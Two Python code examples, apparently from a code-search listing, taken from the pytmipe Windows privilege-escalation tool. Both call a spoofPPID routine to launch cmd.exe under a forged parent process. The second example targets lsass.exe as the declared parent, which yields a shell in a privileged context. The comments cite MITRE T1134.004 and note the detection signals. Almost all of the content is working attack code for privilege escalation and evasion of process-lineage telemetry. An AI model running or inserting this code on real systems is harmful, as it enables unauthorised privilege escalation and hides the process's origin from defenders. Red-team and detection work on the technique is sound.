示例#1
文件: tmipe.py 项目: zha0/pytmipe
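def spoof(args):
    """Handle the parent-PID-spoofing sub-command.

    Two keys are read from *args*:

    * ``'candidates'`` -- when equal to True, the candidate parent processes
      are printed through ``Escalation.printCandidatesSpoofPPID``.
    * ``'pid'`` -- PID to declare as the parent of a new ``cmd.exe``. When it
      is None an error is logged and no process is created.

    Parent PID spoofing is catalogued as MITRE ATT&CK T1134.004. The created
    process reports the chosen PID as its parent even though this process
    created it, so telemetry that records the real creator next to the
    declared parent exposes the mismatch.
    """
    if args['candidates'] == True:
        printT("Candidates:")
        esc = Escalation()
        esc.printCandidatesSpoofPPID()
    if args['pid'] is None:
        logging.error("A pid has to be selected")
    else:
        printT("Trying to exploit parent PID Spoofing...")
        esc = Escalation()
        targetPID = args['pid']
        # The original never stored the call's result and then compared an
        # unassigned `status` with the undefined name `true`, so a NameError
        # was raised right after the call and the outcome was never reported.
        # NOTE(review): assumes spoofPPID returns a truthy value on success;
        # its return contract is not visible here -- confirm.
        status = esc.spoofPPID(ppid=targetPID,
                               appName="c:\\windows\\system32\\cmd.exe",
                               cmdLine=None,
                               lpProcessAttributes=None,
                               lpThreadAttributes=None,
                               bInheritHandles=0,
                               # EXTENDED_STARTUPINFO_PRESENT signals that an
                               # extended startup-info structure is supplied.
                               creationFlags=(CREATE_NEW_CONSOLE
                                              | EXTENDED_STARTUPINFO_PRESENT),
                               lpEnvironment=None,
                               lpCurrentDirectory=None)
        if status:
            printT("Process created")
        else:
            logging.error("Impossible to create the new process")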
示例#2
# -*- coding: UTF-8 -*-
# By Quentin HARDY ([email protected]) - bobsecq

import sys

# The helper modules sit one directory up, so the search path is extended
# before they are imported.
sys.path.append('../')
from utils import *

# Statement order is kept from the original: logging is configured before the
# escalation module is imported.
configureLogging()
from escalation import Escalation

esc = Escalation()
# Print the processes the tool considers usable as a declared parent.
esc.printCandidatesSpoofPPID()

# The declared parent is lsass.exe. A cmd.exe whose recorded parent is
# lsass.exe is not a normal process lineage, which makes this pairing a
# practical detection signal for parent PID spoofing (MITRE ATT&CK T1134.004).
lsass_pid = getPIDfromName('lsass.exe')
spawn_options = {
    "ppid": lsass_pid,
    "appName": "c:\\windows\\system32\\cmd.exe",
    "cmdLine": None,
    "lpProcessAttributes": None,
    "lpThreadAttributes": None,
    "bInheritHandles": 0,
    "creationFlags": CREATE_NEW_CONSOLE | EXTENDED_STARTUPINFO_PRESENT,
    "lpEnvironment": None,
    "lpCurrentDirectory": None,
}
esc.spoofPPID(**spawn_options)